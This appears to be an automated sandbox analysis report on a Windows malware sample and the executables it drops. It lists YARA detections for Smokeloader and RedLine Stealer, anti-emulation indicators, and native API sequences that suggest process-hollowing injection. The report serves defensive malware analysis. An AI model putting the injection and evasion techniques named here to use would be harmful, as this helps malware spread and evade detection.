Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
PE file has a writeable .text section
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 0_2_00403406
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 12_2_042D9B10
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 12_2_042DA4F0
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 12_2_042D9850
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00427353 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00420880 5_2_00420880
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00404970 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0041FD10 5_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0043B050 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00426174 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004061F0 5_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00426284 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004223B8 5_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00405440 5_2_00405440
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0040F400 5_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004164D2 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00433480 5_2_00433480
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00403570 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00421580 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004016E0 5_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004067B0 5_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_004089A0 5_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00424B80 5_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00421C71 5_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00425CEE 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00440D36 5_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0043AD30 5_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00407DF0 5_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00404EF0 5_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_00435EB0 5_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02141267 5_2_02141267
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0217B2B7 5_2_0217B2B7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021663DB 5_2_021663DB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02148057 5_2_02148057
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02162067 5_2_02162067
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02176117 5_2_02176117
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02145157 5_2_02145157
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0214F667 5_2_0214F667
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021456A7 5_2_021456A7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021736E7 5_2_021736E7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02156739 5_2_02156739
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021437D7 5_2_021437D7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02146457 5_2_02146457
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021664EB 5_2_021664EB
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_021675BA 5_2_021675BA
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02146A17 5_2_02146A17
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02160AE7 5_2_02160AE7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02144BD7 5_2_02144BD7
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02165F55 5_2_02165F55
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0217AF97 5_2_0217AF97
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02148C07 5_2_02148C07
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DAB10 12_2_042DAB10
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9EECD0 13_2_6C9EECD0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C98ECC0 13_2_6C98ECC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6AC30 13_2_6CA6AC30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA56C00 13_2_6CA56C00
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C99AC60 13_2_6C99AC60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C994DB0 13_2_6C994DB0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA26D90 13_2_6CA26D90
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB1CDC0 13_2_6CB1CDC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB18D20 13_2_6CB18D20
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA5ED70 13_2_6CA5ED70
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CABAD50 13_2_6CABAD50
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA16E90 13_2_6CA16E90
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C99AEC0 13_2_6C99AEC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA30EC0 13_2_6CA30EC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA70E20 13_2_6CA70E20
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA2EE70 13_2_6CA2EE70
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD8FB0 13_2_6CAD8FB0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C99EFB0 13_2_6C99EFB0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6EFF0 13_2_6CA6EFF0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C990FE0 13_2_6C990FE0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C996F10 13_2_6C996F10
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0F20 13_2_6CAD0F20
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA52F70 13_2_6CA52F70
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FEF40 13_2_6C9FEF40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA968E0 13_2_6CA968E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA1A820 13_2_6CA1A820
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9E0820 13_2_6C9E0820
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA64840 13_2_6CA64840
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA209A0 13_2_6CA209A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA4A9A0 13_2_6CA4A9A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA509B0 13_2_6CA509B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAAC9E0 13_2_6CAAC9E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9C49F0 13_2_6C9C49F0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9E6900 13_2_6C9E6900
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9C8960 13_2_6C9C8960
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA0EA80 13_2_6CA0EA80
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA48A30 13_2_6CA48A30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA3EA00 13_2_6CA3EA00
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA0CA70 13_2_6CA0CA70
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA30BA0 13_2_6CA30BA0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA96BE0 13_2_6CA96BE0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CABA480 13_2_6CABA480
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9D64D0 13_2_6C9D64D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA2A4D0 13_2_6CA2A4D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA1A430 13_2_6CA1A430
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F4420 13_2_6C9F4420
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9A8460 13_2_6C9A8460
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9845B0 13_2_6C9845B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA5A5E0 13_2_6CA5A5E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA1E5F0 13_2_6CA1E5F0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA30570 13_2_6CA30570
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9E8540 13_2_6C9E8540
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA94540 13_2_6CA94540
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD8550 13_2_6CAD8550
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F2560 13_2_6C9F2560
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA2E6E0 13_2_6CA2E6E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9B46D0 13_2_6C9B46D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9EE6E0 13_2_6C9EE6E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9EC650 13_2_6C9EC650
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9BA7D0 13_2_6C9BA7D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA10700 13_2_6CA10700
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C988090 13_2_6C988090
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6C0B0 13_2_6CA6C0B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9A00B0 13_2_6C9A00B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA5C000 13_2_6CA5C000
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA58010 13_2_6CA58010
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9DE070 13_2_6C9DE070
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9901E0 13_2_6C9901E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA06130 13_2_6CA06130
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA74130 13_2_6CA74130
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F8140 13_2_6C9F8140
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA622A0 13_2_6CA622A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA5E2B0 13_2_6CA5E2B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB162C0 13_2_6CB162C0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA68220 13_2_6CA68220
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA5A210 13_2_6CA5A210
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA18260 13_2_6CA18260
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA28250 13_2_6CA28250
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9EE3B0 13_2_6C9EE3B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9C23A0 13_2_6C9C23A0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9E43E0 13_2_6C9E43E0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA02320 13_2_6CA02320
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAAC360 13_2_6CAAC360
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA26370 13_2_6CA26370
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C998340 13_2_6C998340
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD2370 13_2_6CAD2370
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C992370 13_2_6C992370
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA2FC80 13_2_6CA2FC80
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA51CE0 13_2_6CA51CE0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACDCD0 13_2_6CACDCD0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9A1C30 13_2_6C9A1C30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C993C40 13_2_6C993C40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAB9C40 13_2_6CAB9C40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C983D80 13_2_6C983D80
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD9D90 13_2_6CAD9D90
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA61DC0 13_2_6CA61DC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F3D00 13_2_6C9F3D00
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9B3EC0 13_2_6C9B3EC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA9DE10 13_2_6CA9DE10
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB15E60 13_2_6CB15E60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAEBE70 13_2_6CAEBE70
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9B1F90 13_2_6C9B1F90
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA3BFF0 13_2_6CA3BFF0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAADFC0 13_2_6CAADFC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB13FC0 13_2_6CB13FC0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAE7F20 13_2_6CAE7F20
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C985F30 13_2_6C985F30
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9C5F20 13_2_6C9C5F20
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA6F8F0 13_2_6CA6F8F0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAEB8F0 13_2_6CAEB8F0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0214F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 02148A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CAC9F30 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B3620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B9B10 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1D930 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1DAE0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB109D0 appears 268 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
PE file does not import any functions
Source: aarhevh.2.dr Static PE information: No import functions for PE file found
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: No import functions for PE file found
Uses 32bit PE files
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
